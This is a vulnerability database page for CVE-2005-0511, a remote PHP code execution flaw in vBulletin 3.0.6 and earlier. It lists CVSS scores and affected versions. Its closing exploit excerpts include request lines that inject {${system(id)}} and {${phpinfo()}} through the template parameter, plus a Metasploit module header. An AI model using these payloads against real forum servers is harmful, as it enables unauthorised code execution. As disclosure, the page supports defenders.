7.5
CVSSv2

CVE-2005-0511

Published: 21/02/2005 Updated: 18/10/2016
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

misc.php for vBulletin 3.0.6 and previous versions, when "Add Template Name in HTML Comments" is enabled, allows remote malicious users to execute arbitrary PHP code via nested variables in the template parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

jelsoft vbulletin 2.2.0

jelsoft vbulletin 2.2.1

jelsoft vbulletin 2.2.2

jelsoft vbulletin 2.2.9_can

jelsoft vbulletin 2.3.0

jelsoft vbulletin 3.0.1

jelsoft vbulletin 3.0.2

jelsoft vbulletin 2.0_beta_2

jelsoft vbulletin 2.0_beta_3

jelsoft vbulletin 2.2.7

jelsoft vbulletin 2.2.8

jelsoft vbulletin 3.0.0_can4

jelsoft vbulletin 3.0.0_rc4

jelsoft vbulletin 3.0_beta_2

jelsoft vbulletin 2.0

jelsoft vbulletin 2.2.3

jelsoft vbulletin 2.2.4

jelsoft vbulletin 2.3.3

jelsoft vbulletin 2.3.4

jelsoft vbulletin 3.0.3

jelsoft vbulletin 3.0.4

jelsoft vbulletin 2.0.1

jelsoft vbulletin 2.0.2

jelsoft vbulletin 2.2.5

jelsoft vbulletin 2.2.6

jelsoft vbulletin 3.0.0

jelsoft vbulletin 3.0.0_beta_2

jelsoft vbulletin 3.0.5

jelsoft vbulletin 3.0.6

Exploits

## # $Id: php_vbulletin_templaterb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' ...
# Tested on vBulletin Version 301 /str0ke # wwwxxxnet/miscphp?do=page&template={${system(id)}} # # [SCAN Associates Security Advisory] # wwwscan-associatesnet Proof of concept ================ sitecom/miscphp?do=page&template={${phpinfo()}} # milw0rmcom [2005-02-22] ...